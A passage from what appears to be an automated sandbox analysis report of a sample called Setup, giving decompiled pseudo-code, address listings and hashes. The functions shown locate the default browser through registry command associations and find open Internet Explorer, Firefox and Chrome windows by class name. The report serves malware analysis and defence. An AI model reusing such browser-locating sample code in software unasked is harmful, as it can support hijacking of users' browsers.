							 *((char*)(E00436BA0( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
							 *((char*)(E00436BA0( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
							_t168 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
							_t293 = _t325 + 0x1c;
							E00433740(_v96, __eflags,  *_t168);
						} else {
							 *((char*)(E00436BA0( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
							 *((char*)(E00436BA0(_a12))) = 1;
							 *((char*)(E00436BA0( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
							_t184 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
							_t293 = _t323 + 0x20;
							_v24 =  *_t184;
						}
					}
				}
				 *((char*)(E00436BA0( *((intOrPtr*)(E0041D410(_v96)))))) = 1;
				E00445360(_a4, _v20);
				 *[fs:0x0] = _v16;
				return _a4;
			}






































                                                                                                                                                              0x00433213
                                                                                                                                                              0x00433215
                                                                                                                                                              0x00433220
                                                                                                                                                              0x00433221
                                                                                                                                                              0x00433225
                                                                                                                                                              0x0043322c
                                                                                                                                                              0x00433230
                                                                                                                                                              0x00433236
                                                                                                                                                              0x0043324a
                                                                                                                                                              0x00433254
                                                                                                                                                              0x00433259
                                                                                                                                                              0x00433267
                                                                                                                                                              0x00433275
                                                                                                                                                              0x0043327a
                                                                                                                                                              0x00433284
                                                                                                                                                              0x00433284
                                                                                                                                                              0x004332a4
                                                                                                                                                              0x004332a9
                                                                                                                                                              0x004332b8
                                                                                                                                                              0x004332c4
                                                                                                                                                              0x004332f3
                                                                                                                                                              0x004332f5
                                                                                                                                                              0x0043332a
                                                                                                                                                              0x0043332f
                                                                                                                                                              0x00433335
                                                                                                                                                              0x0043333a
                                                                                                                                                              0x00433342
                                                                                                                                                              0x00433344
                                                                                                                                                              0x00433351
                                                                                                                                                              0x00433351
                                                                                                                                                              0x004332f7
                                                                                                                                                              0x004332fb
                                                                                                                                                              0x00433300
                                                                                                                                                              0x00433306
                                                                                                                                                              0x0043330b
                                                                                                                                                              0x00433313
                                                                                                                                                              0x00433315
                                                                                                                                                              0x00433322
                                                                                                                                                              0x00433322
                                                                                                                                                              0x00433324
                                                                                                                                                              0x004332c6
                                                                                                                                                              0x004332d1
                                                                                                                                                              0x004332de
                                                                                                                                                              0x004332eb
                                                                                                                                                              0x004332eb
                                                                                                                                                              0x00433356
                                                                                                                                                              0x00433359
                                                                                                                                                              0x00433368
                                                                                                                                                              0x0043336d
                                                                                                                                                              0x00433375
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0043337f
                                                                                                                                                              0x004333a3
                                                                                                                                                              0x004333a8
                                                                                                                                                              0x004333af
                                                                                                                                                              0x00433523
                                                                                                                                                              0x0043352a
                                                                                                                                                              0x0043352f
                                                                                                                                                              0x00433535
                                                                                                                                                              0x00433537
                                                                                                                                                              0x004335b7
                                                                                                                                                              0x004335bc
                                                                                                                                                              0x004335c2
                                                                                                                                                              0x004335c4
                                                                                                                                                              0x004335ca
                                                                                                                                                              0x004335cf
                                                                                                                                                              0x004335d4
                                                                                                                                                              0x004335de
                                                                                                                                                              0x004335de
                                                                                                                                                              0x004335fa
                                                                                                                                                              0x0043361f
                                                                                                                                                              0x00433631
                                                                                                                                                              0x00433636
                                                                                                                                                              0x0043363f
                                                                                                                                                              0x00433539
                                                                                                                                                              0x00433550
                                                                                                                                                              0x0043355f
                                                                                                                                                              0x00433584
                                                                                                                                                              0x00433596
                                                                                                                                                              0x0043359b
                                                                                                                                                              0x004335a0
                                                                                                                                                              0x004335a0
                                                                                                                                                              0x004333b5
                                                                                                                                                              0x004333d9
                                                                                                                                                              0x004333e0
                                                                                                                                                              0x004333e5
                                                                                                                                                              0x004333ed
                                                                                                                                                              0x0043346d
                                                                                                                                                              0x00433472
                                                                                                                                                              0x00433478
                                                                                                                                                              0x0043347a
                                                                                                                                                              0x00433480
                                                                                                                                                              0x00433485
                                                                                                                                                              0x0043348a
                                                                                                                                                              0x00433494
                                                                                                                                                              0x00433494
                                                                                                                                                              0x004334b0
                                                                                                                                                              0x004334d5
                                                                                                                                                              0x004334e7
                                                                                                                                                              0x004334ec
                                                                                                                                                              0x004334f5
                                                                                                                                                              0x004333ef
                                                                                                                                                              0x00433406
                                                                                                                                                              0x00433415
                                                                                                                                                              0x0043343a
                                                                                                                                                              0x0043344c
                                                                                                                                                              0x00433451
                                                                                                                                                              0x00433456
                                                                                                                                                              0x00433456
                                                                                                                                                              0x004334fa
                                                                                                                                                              0x00433644
                                                                                                                                                              0x0043365c
                                                                                                                                                              0x00433666
                                                                                                                                                              0x00433671
                                                                                                                                                              0x0043367d

                                                                                                                                                              APIs
                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00433275
                                                                                                                                                                • Part of subcall function 00456A4C: RaiseException.KERNEL32(?,?,00417495,?,?,?,?,?,00417495,?,00544A68,?), ref: 00456A8E
                                                                                                                                                              • HandleT.LIBCPMTD ref: 004332C9
                                                                                                                                                              • HandleT.LIBCPMTD ref: 004332D6
                                                                                                                                                              • HandleT.LIBCPMTD ref: 004332E3
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0043330B
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0043331A
                                                                                                                                                                • Part of subcall function 00433740: HandleT.LIBCPMTD ref: 004337D4
                                                                                                                                                                • Part of subcall function 00433740: HandleT.LIBCPMTD ref: 004337E3
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0043333A
                                                                                                                                                              • HandleT.LIBCPMTD ref: 00433349
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0043364C
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00433666
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Handle$AllocatorDebugExceptionException@8HeapRaiseThrow
                                                                                                                                                              • String ID: map/set<T> too long
                                                                                                                                                              • API String ID: 3699313741-1285458680
                                                                                                                                                              • Opcode ID: 5c378c61003a94509d9a9d9cc51c2f99947a6c586fe5524ef43e96455eefa086
                                                                                                                                                              • Instruction ID: c96cb9d9ccfe4d81dabe12786e20b18d9636dbc6828f727d1f2b603ee65e5e8b
                                                                                                                                                              • Opcode Fuzzy Hash: 5c378c61003a94509d9a9d9cc51c2f99947a6c586fe5524ef43e96455eefa086
                                                                                                                                                              • Instruction Fuzzy Hash: 5BE1A6F5E00144AFDB04EFA1E89296FB375AF98308F14446DF8059B352DA39FA11CB66
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004903A0 Relevance: 17.8, APIs: 4, Strings: 6, Instructions: 327COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 522 4903a0-490420 call 434e30 call 417a20 * 2 call 434050 call 4175c0 call 494f20 535 490538-490545 call 416630 522->535 536 490426-49044a call 414c90 call 443050 522->536 542 49054b-490561 call 41eea0 535->542 543 4905fc-490609 call 416630 535->543 548 49052c-490533 call 40d320 536->548 549 490450-49045a call 41d530 536->549 542->543 555 490567-4905b2 call 451d90 call 41ede0 542->555 551 49083b-49088f call 416630 call 4176e0 call 41ef60 call 44f6c8 543->551 552 49060f-490636 call 4130d0 call 416a30 call 41eea0 543->552 548->535 549->548 563 490460-490471 call 494f40 549->563 552->551 586 49063c-4906ae call 451d90 call 41ede0 call 41ef10 call 4168f0 552->586 574 4905f4-4905f7 call 41ef10 555->574 575 4905b4-4905ef call 434050 call 417910 call 4181d0 call 4176e0 555->575 572 490473-49049d call 41d530 563->572 573 4904a7-4904d6 call 41d530 563->573 592 4904a2-4904a5 572->592 596 4904d9-4904dd 573->596 574->543 575->574 611 4906ca-4906d1 586->611 612 4906b0-4906c4 call 4168f0 586->612 592->596 596->548 601 4904df-4904e3 596->601 601->548 604 4904e5-490526 call 434050 call 417910 call 4181d0 call 4176e0 CoTaskMemFree 601->604 604->548 616 4906de-49071c call 4296f0 611->616 617 4906d3-4906db 611->617 612->611 624 4907aa-4907ae 616->624 625 490722-49073c 616->625 617->616 626 4907eb-490836 call 434050 call 417910 call 4181d0 call 4176e0 624->626 627 4907b0-4907b8 624->627 628 49074d-490759 625->628 626->551 627->626 630 4907ba-4907ca call 416630 627->630 631 49075b 628->631 632 49075d-490768 628->632 642 4907dc-4907e6 call 4130d0 630->642 643 4907cc-4907d7 call 4130d0 630->643 631->628 632->624 636 49076a-490783 call 434050 call 417910 632->636 648 490788-4907a5 call 4181d0 call 4176e0 636->648 642->626 643->642 648->624
                                                                                                                                                              C-Code - Quality: 91%
                                                                                                                                                              			E004903A0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, signed short* _a12) {
				char _v8;
				char _v16;
				char _v24;
				signed int _v28;
				char _v56;
				char _v60;
				intOrPtr _v64;
				char _v68;
				char _v72;
				char _v590;
				char _v592;
				char _v596;
				char _v1118;
				signed int _v1120;
				signed short _v1124;
				signed short* _v1128;
				char _v1132;
				char _v1133;
				char _v1168;
				char _v1169;
				char _v1204;
				char _v1205;
				char _v1240;
				char _v1241;
				char _v1276;
				char _v1277;
				char _v1278;
				intOrPtr _v1284;
				intOrPtr* _v1288;
				intOrPtr* _v1292;
				signed int _t134;
				signed int _t135;
				signed char _t147;
				void* _t154;
				signed short* _t160;
				void* _t163;
				signed char _t169;
				signed short* _t181;
				intOrPtr _t193;
				void* _t195;
				intOrPtr _t208;
				short _t260;
				signed int _t286;
				signed int _t309;
				void* _t310;
				void* _t311;
				void* _t313;
				void* _t315;

				_t315 = __eflags;
				_t308 = __esi;
				_t307 = __edi;
				_t209 = __ebx;
				_push(0xffffffff);
				_push(0x5084ad);
				_push( *[fs:0x0]);
				_t311 = _t310 - 0x4fc;
				_t134 =  *0x561244; // 0xddd124f9
				_t135 = _t134 ^ _t309;
				_v28 = _t135;
				_push(_t135);
				 *[fs:0x0] =  &_v16;
				_v1284 = __ecx;
				E00434E30( &_v24);
				_v8 = 0;
				E00417A20(__ebx, _a8 + 4, __edi, __esi, 0, 0xffffffff);
				E00417A20(__ebx, _a4 + 4, __edi, __esi, 0, 0xffffffff);
				E004175C0(E00434050( &_v1133));
				_v8 = 1;
				if((E00494F20(_t315) & 0x000000ff) == 0) {
					L10:
					if((E00416630( &_v56) & 0x000000ff) != 0 && E0041EEA0( &_v24, 0x80000000, L".html", 1) == 0) {
						_t260 =  *0x528ea0; // 0x0
						_v592 = _t260;
						E00451D90(_t307,  &_v590, 0, 0x206);
						_t311 = _t311 + 0xc;
						_v596 = 0x104;
						if(E0041EDE0( &_v24, 0x528ea4,  &_v592,  &_v596) == 0) {
							E00417910( &_v592, E00434050( &_v1205));
							_v8 = 4;
							E004181D0( &_v60,  &_v1204);
							_v8 = 1;
							E004176E0();
						}
						E0041EF10( &_v24);
					}
					if((E00416630( &_v56) & 0x000000ff) != 0) {
						L34:
						_t147 = E00416630(_a4 + 4);
						asm("sbb edx, edx");
						_v1278 =  ~(_t147 & 0x000000ff) + 1;
						_v8 = 0;
						E004176E0();
						_v8 = 0xffffffff;
						E0041EF60( &_v24);
						 *[fs:0x0] = _v16;
						_t132 =  &_v28; // 0x490962
						__eflags =  *_t132 ^ _t309;
						return E0044F6C8(_v1278, _t209,  *_t132 ^ _t309,  ~(_t147 & 0x000000ff) + 1, _t307, _t308);
					} else {
						E004130D0( &_v56, L"\\shell\\open\\command");
						_t154 = E0041EEA0( &_v24, 0x80000000, E00416A30( &_v56), 1); // executed
						if(_t154 != 0) {
							goto L34;
						}
						_t286 =  *0x528ed0; // 0x0
						_v1120 = _t286;
						E00451D90(_t307,  &_v1118, 0, 0x206);
						_v1132 = 0x104;
						E0041EDE0( &_v24, 0x528ed4,  &_v1120,  &_v1132); // executed
						E0041EF10( &_v24); // executed
						_t160 = E004168F0( &_v1120, L"\"%1\"");
						_t313 = _t311 + 0x14;
						_v1128 = _t160;
						if(_v1128 == 0) {
							_t181 = E004168F0( &_v1120, L"%1");
							_t313 = _t313 + 8;
							_v1128 = _t181;
						}
						if(_v1128 != 0) {
							 *_v1128 = 0;
						}
						_v1124 = (0 | (_v1120 & 0x0000ffff) == 0x00000022) + (0 | (_v1120 & 0x0000ffff) == 0x00000022) + 0x20;
						_v1128 = E004296F0( &_v1118, _v1124 & 0x0000ffff);
						if(_v1128 == 0) {
							L28:
							__eflags = _a12;
							if(_a12 != 0) {
								__eflags =  *_a12 & 0x0000ffff;
								if(( *_a12 & 0x0000ffff) != 0) {
									_t169 = E00416630(_a8 + 4);
									__eflags = _t169 & 0x000000ff;
									if((_t169 & 0x000000ff) == 0) {
										__eflags = _a8 + 4;
										E004130D0(_a8 + 4, " ");
									}
									__eflags = _a8 + 4;
									E004130D0(_a8 + 4, _a12);
								}
							}
							_t163 = E00434050( &_v1277);
							(_v1120 & 0x0000ffff) - 0x22 = (_v1120 & 0x0000ffff) == 0x22;
							E00417910(_t309 + (0 | (_v1120 & 0x0000ffff) == 0x00000022) * 2 - 0x45c, _t163);
							_v8 = 6;
							E004181D0(_a4,  &_v1276);
							_v8 = 1;
							E004176E0();
							goto L34;
						} else {
							 *_v1128 = 0;
							_v1128 =  &(_v1128[1]);
							while(( *_v1128 & 0x0000ffff) == 0x20) {
								_v1128 =  &(_v1128[1]);
							}
							__eflags =  *_v1128 & 0x0000ffff;
							if(( *_v1128 & 0x0000ffff) != 0) {
								E00417910(_v1128, E00434050( &_v1241)); // executed
								_v8 = 5;
								E004181D0(_a8,  &_v1240);
								_v8 = 1;
								E004176E0();
							}
							goto L28;
						}
					}
				} else {
					E00414C90();
					_v8 = 2;
					_t193 = E00443050( &_v68, 0x51bafc, 0, 0x17); // executed
					_v64 = _t193;
					if(_v64 >= 0) {
						_t195 = E0041D530( &_v68);
						_t318 = _t195;
						if(_t195 != 0) {
							_v72 = 0;
							if((E00494F40(_t318) & 0x000000ff) == 0) {
								_v1292 = E0041D530( &_v68);
								_v64 =  *((intOrPtr*)( *((intOrPtr*)( *_v1292 + 0xc))))(_v1292, L".html", 0, 1,  &_v72);
							} else {
								_v1288 = E0041D530( &_v68);
								_t208 =  *((intOrPtr*)( *((intOrPtr*)( *_v1288 + 0xc))))(_v1288, L"http", 0, 1,  &_v72); // executed
								_v64 = _t208;
							}
							if(_v64 >= 0 && _v72 != 0) {
								E00417910(_v72, E00434050( &_v1169));
								_v8 = 3;
								E004181D0( &_v60,  &_v1168);
								_v8 = 2;
								E004176E0();
								__imp__CoTaskMemFree(_v72);
							}
						}
					}
					_v8 = 1;
					E0040D320();
					goto L10;
				}
			}



















































                                                                                                                                                              0x004903a0
                                                                                                                                                              0x004903a0
                                                                                                                                                              0x004903a0
                                                                                                                                                              0x004903a0
                                                                                                                                                              0x004903a3
                                                                                                                                                              0x004903a5
                                                                                                                                                              0x004903b0
                                                                                                                                                              0x004903b1
                                                                                                                                                              0x004903b7
                                                                                                                                                              0x004903bc
                                                                                                                                                              0x004903be
                                                                                                                                                              0x004903c1
                                                                                                                                                              0x004903c5
                                                                                                                                                              0x004903cb
                                                                                                                                                              0x004903d4
                                                                                                                                                              0x004903d9
                                                                                                                                                              0x004903ea
                                                                                                                                                              0x004903f9
                                                                                                                                                              0x0049040d
                                                                                                                                                              0x00490412
                                                                                                                                                              0x00490420
                                                                                                                                                              0x00490538
                                                                                                                                                              0x00490545
                                                                                                                                                              0x00490567
                                                                                                                                                              0x0049056e
                                                                                                                                                              0x00490583
                                                                                                                                                              0x00490588
                                                                                                                                                              0x0049058b
                                                                                                                                                              0x004905b2
                                                                                                                                                              0x004905cd
                                                                                                                                                              0x004905d2
                                                                                                                                                              0x004905e0
                                                                                                                                                              0x004905e5
                                                                                                                                                              0x004905ef
                                                                                                                                                              0x004905ef
                                                                                                                                                              0x004905f7
                                                                                                                                                              0x004905f7
                                                                                                                                                              0x00490609
                                                                                                                                                              0x0049083b
                                                                                                                                                              0x00490841
                                                                                                                                                              0x0049084b
                                                                                                                                                              0x00490850
                                                                                                                                                              0x00490856
                                                                                                                                                              0x0049085d
                                                                                                                                                              0x00490862
                                                                                                                                                              0x0049086c
                                                                                                                                                              0x0049087a
                                                                                                                                                              0x00490882
                                                                                                                                                              0x00490885
                                                                                                                                                              0x0049088f
                                                                                                                                                              0x0049060f
                                                                                                                                                              0x00490617
                                                                                                                                                              0x0049062f
                                                                                                                                                              0x00490636
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0049063c
                                                                                                                                                              0x00490643
                                                                                                                                                              0x00490658
                                                                                                                                                              0x00490660
                                                                                                                                                              0x00490680
                                                                                                                                                              0x00490688
                                                                                                                                                              0x00490699
                                                                                                                                                              0x0049069e
                                                                                                                                                              0x004906a1
                                                                                                                                                              0x004906ae
                                                                                                                                                              0x004906bc
                                                                                                                                                              0x004906c1
                                                                                                                                                              0x004906c4
                                                                                                                                                              0x004906c4
                                                                                                                                                              0x004906d1
                                                                                                                                                              0x004906db
                                                                                                                                                              0x004906db
                                                                                                                                                              0x004906f1
                                                                                                                                                              0x0049070f
                                                                                                                                                              0x0049071c
                                                                                                                                                              0x004907aa
                                                                                                                                                              0x004907aa
                                                                                                                                                              0x004907ae
                                                                                                                                                              0x004907b6
                                                                                                                                                              0x004907b8
                                                                                                                                                              0x004907c0
                                                                                                                                                              0x004907c8
                                                                                                                                                              0x004907ca
                                                                                                                                                              0x004907d4
                                                                                                                                                              0x004907d7
                                                                                                                                                              0x004907d7
                                                                                                                                                              0x004907e3
                                                                                                                                                              0x004907e6
                                                                                                                                                              0x004907e6
                                                                                                                                                              0x004907b8
                                                                                                                                                              0x004907f1
                                                                                                                                                              0x00490803
                                                                                                                                                              0x00490814
                                                                                                                                                              0x00490819
                                                                                                                                                              0x00490827
                                                                                                                                                              0x0049082c
                                                                                                                                                              0x00490836
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00490722
                                                                                                                                                              0x0049072a
                                                                                                                                                              0x00490736
                                                                                                                                                              0x0049074d
                                                                                                                                                              0x00490747
                                                                                                                                                              0x00490747
                                                                                                                                                              0x00490766
                                                                                                                                                              0x00490768
                                                                                                                                                              0x00490783
                                                                                                                                                              0x00490788
                                                                                                                                                              0x00490796
                                                                                                                                                              0x0049079b
                                                                                                                                                              0x004907a5
                                                                                                                                                              0x004907a5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00490768
                                                                                                                                                              0x0049071c
                                                                                                                                                              0x00490426
                                                                                                                                                              0x00490429
                                                                                                                                                              0x0049042e
                                                                                                                                                              0x0049043e
                                                                                                                                                              0x00490443
                                                                                                                                                              0x0049044a
                                                                                                                                                              0x00490453
                                                                                                                                                              0x00490458
                                                                                                                                                              0x0049045a
                                                                                                                                                              0x00490460
                                                                                                                                                              0x00490471
                                                                                                                                                              0x004904af
                                                                                                                                                              0x004904d6
                                                                                                                                                              0x00490473
                                                                                                                                                              0x0049047b
                                                                                                                                                              0x004904a0
                                                                                                                                                              0x004904a2
                                                                                                                                                              0x004904a2
                                                                                                                                                              0x004904dd
                                                                                                                                                              0x004904fb
                                                                                                                                                              0x00490500
                                                                                                                                                              0x0049050e
                                                                                                                                                              0x00490513
                                                                                                                                                              0x0049051d
                                                                                                                                                              0x00490526
                                                                                                                                                              0x00490526
                                                                                                                                                              0x004904dd
                                                                                                                                                              0x0049045a
                                                                                                                                                              0x0049052c
                                                                                                                                                              0x00490533
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00490533

                                                                                                                                                              APIs
                                                                                                                                                              • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 004903D4
                                                                                                                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,00000000), ref: 00490526
                                                                                                                                                              • _memset.LIBCMT ref: 00490583
                                                                                                                                                              • _memset.LIBCMT ref: 00490658
                                                                                                                                                                • Part of subcall function 00443050: CoCreateInstance.OLE32(000000FF,00000000,000000FF,0053D3B4,DDD124F9,?,?,00490443,0051BAFC,00000000,00000017,00000000,00000000,000000FF,00000000,000000FF), ref: 0044306C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _memset$CreateFreeInstanceIterator_baseIterator_base::_Taskstd::_
                                                                                                                                                              • String ID: "%1"$.html$.html$\shell\open\command$bI$http
                                                                                                                                                              • API String ID: 2934898464-3068258827
                                                                                                                                                              • Opcode ID: 0a6d62c7a929561fdff6fd2344a96f4eeb62c02c6712fcff80c20a96d819e14c
                                                                                                                                                              • Instruction ID: a00b38a2294e0f63c61b35cacd2b43a42522c649960b94876aacb899d072ca9d
                                                                                                                                                              • Opcode Fuzzy Hash: 0a6d62c7a929561fdff6fd2344a96f4eeb62c02c6712fcff80c20a96d819e14c
                                                                                                                                                              • Instruction Fuzzy Hash: 8AD1A3B0900218AEDF14DF55CD91BEEB774AF54308F0040AEE606671D2EB786E89CF59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00491FB0 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 278COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                              			E00491FB0(void* __ebx, intOrPtr __ecx, struct HWND__* __edx, void* __edi, void* __esi, struct HWND__** _a4) {
				struct HWND__* _v8;
				char _v16;
				struct HWND__* _v20;
				signed int _v21;
				signed int _v28;
				void* _v60;
				char _v72;
				short _v592;
				char _v596;
				void* _v632;
				struct HWND__* _v636;
				char _v668;
				char _v669;
				char _v680;
				void* _v716;
				char _v720;
				char _v752;
				char _v753;
				char _v764;
				void* _v800;
				char _v804;
				char _v836;
				char _v837;
				char _v848;
				void* _v884;
				int _v888;
				char _v920;
				char _v921;
				char _v932;
				void* _v968;
				int _v972;
				char _v1004;
				char _v1005;
				char _v1016;
				char _v1017;
				char _v1052;
				char _v1053;
				char _v1060;
				char _v1064;
				struct HWND__* _v1068;
				intOrPtr _v1072;
				intOrPtr _v1076;
				intOrPtr _v1080;
				intOrPtr _v1084;
				intOrPtr _v1088;
				intOrPtr _v1092;
				intOrPtr _v1096;
				intOrPtr _v1100;
				intOrPtr _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				signed int _t141;
				signed int _t142;
				struct HWND__* _t189;
				signed int _t191;
				struct HWND__* _t192;
				signed int _t195;
				signed char _t204;
				void* _t207;
				struct HWND__* _t271;
				void* _t284;
				void* _t285;
				signed int _t286;

				_t285 = __esi;
				_t284 = __edi;
				_t271 = __edx;
				_t207 = __ebx;
				_push(0xffffffff);
				_push(0x51140b);
				_push( *[fs:0x0]);
				_t141 =  *0x561244; // 0xddd124f9
				_t142 = _t141 ^ _t286;
				_v28 = _t142;
				_push(_t142);
				 *[fs:0x0] =  &_v16;
				_v1072 = __ecx;
				if( *0x5bc5fc == 0xfffffffe) {
					 *0x5bc5fc = 0xffffffff;
					E00433E30( &_v72);
					_v8 = 0;
					E00413100( &_v596);
					_v636 = 0;
					E00417910(L"IEFrame", E00434050( &_v669));
					_v8 = 1;
					_v1076 = E00433FC0( &_v668,  &_v636);
					_v1080 = _v1076;
					_v8 = 2;
					E00432780( &_v72, __eflags,  &_v680, _v1080);
					_v8 = 1;
					E00443640();
					_v8 = 0;
					E004176E0();
					_v720 = 1;
					E00417910(L"MozillaWindowClass", E00434050( &_v753));
					_v8 = 3;
					_v1084 = E00433FC0( &_v752,  &_v720);
					_v1088 = _v1084;
					_v8 = 4;
					E00432780( &_v72, __eflags,  &_v764, _v1088);
					_v8 = 3;
					E00443640();
					_v8 = 0;
					E004176E0();
					_v804 = 1;
					E00417910(L"MozillaUIWindowClass", E00434050( &_v837));
					_v8 = 5;
					_v1092 = E00433FC0( &_v836,  &_v804);
					_v1096 = _v1092;
					_v8 = 6;
					E00432780( &_v72, __eflags,  &_v848, _v1096);
					_v8 = 5;
					E00443640();
					_v8 = 0;
					E004176E0();
					_v888 = 2;
					E00417910(L"Chrome_WidgetWin_0", E00434050( &_v921));
					_v8 = 7;
					_v1100 = E00433FC0( &_v920,  &_v888);
					_v1104 = _v1100;
					_v8 = 8;
					E00432780( &_v72, __eflags,  &_v932, _v1104);
					_v8 = 7;
					E00443640();
					_v8 = 0;
					E004176E0();
					_v972 = 2;
					E00417910(L"Chrome_WidgetWin_1", E00434050( &_v1005));
					_v8 = 9;
					_v1108 = E00433FC0( &_v1004,  &_v972);
					_v1112 = _v1108;
					_v8 = 0xa;
					E00432780( &_v72, __eflags,  &_v1016, _v1112);
					_v8 = 9;
					E00443640();
					_v8 = 0;
					E004176E0();
					_v21 = 0;
					_v20 = 0;
					E004175C0(E00434050( &_v1017));
					_v8 = 0xb;
					while(1) {
						__eflags = _v21 & 0x000000ff;
						if((_v21 & 0x000000ff) != 0) {
							break;
						}
						__eflags = _v20;
						if(_v20 != 0) {
							_v20 = GetWindow(_v20, 2);
						} else {
							_v20 = GetTopWindow(0);
						}
						__eflags = _v20;
						if(_v20 != 0) {
							_t195 = GetClassNameW(_v20,  &_v592, 0x104);
							__eflags = _t195;
							if(_t195 <= 0) {
								goto L14;
							}
							E00417910( &_v592, E00434050( &_v1053));
							_v8 = 0xc;
							_v596 =  *((intOrPtr*)(E00434AA0( &_v72, __eflags,  &_v1060,  &_v1052)));
							_v8 = 0xb;
							E004176E0();
							_t204 = E00434020( &_v596, __eflags, E00407DE0( &_v72,  &_v1064));
							__eflags = _t204 & 0x000000ff;
							if((_t204 & 0x000000ff) == 0) {
								goto L14;
							}
							__eflags = _a4;
							if(_a4 != 0) {
								 *_a4 = _v20;
							}
							 *0x5bc5fc =  *(E0043D840( &_v596) + 0x20);
							_v21 = 1;
							break;
						} else {
							_v21 = 1;
							L14:
							continue;
						}
					}
					__eflags =  *0x5bc5fc - 0xffffffff;
					if( *0x5bc5fc == 0xffffffff) {
						_t191 = E00490170(_v1072, 0x30, 1);
						__eflags = _t191;
						if(_t191 != 0) {
							_t192 = E00491620(_v1072); // executed
							 *0x5bc5fc = _t192;
						}
					}
					_t271 =  *0x5bc5fc; // 0x0
					_v1068 = _t271;
					_v8 = 0;
					E004176E0();
					_v8 = 0xffffffff;
					E004326D0();
					_t189 = _v1068;
					L19:
					 *[fs:0x0] = _v16;
					return E0044F6C8(_t189, _t207, _v28 ^ _t286, _t271, _t284, _t285);
				}
				_t189 =  *0x5bc5fc; // 0x0
				goto L19;
			}


































































                                                                                                                                                              0x00491fb0
                                                                                                                                                              0x00491fb0
                                                                                                                                                              0x00491fb0
                                                                                                                                                              0x00491fb0
                                                                                                                                                              0x00491fb3
                                                                                                                                                              0x00491fb5
                                                                                                                                                              0x00491fc0
                                                                                                                                                              0x00491fc7
                                                                                                                                                              0x00491fcc
                                                                                                                                                              0x00491fce
                                                                                                                                                              0x00491fd1
                                                                                                                                                              0x00491fd5
                                                                                                                                                              0x00491fdb
                                                                                                                                                              0x00491fe8
                                                                                                                                                              0x00491ff4
                                                                                                                                                              0x00492001
                                                                                                                                                              0x00492006
                                                                                                                                                              0x00492013
                                                                                                                                                              0x00492018
                                                                                                                                                              0x00492039
                                                                                                                                                              0x0049203e
                                                                                                                                                              0x0049205b
                                                                                                                                                              0x00492067
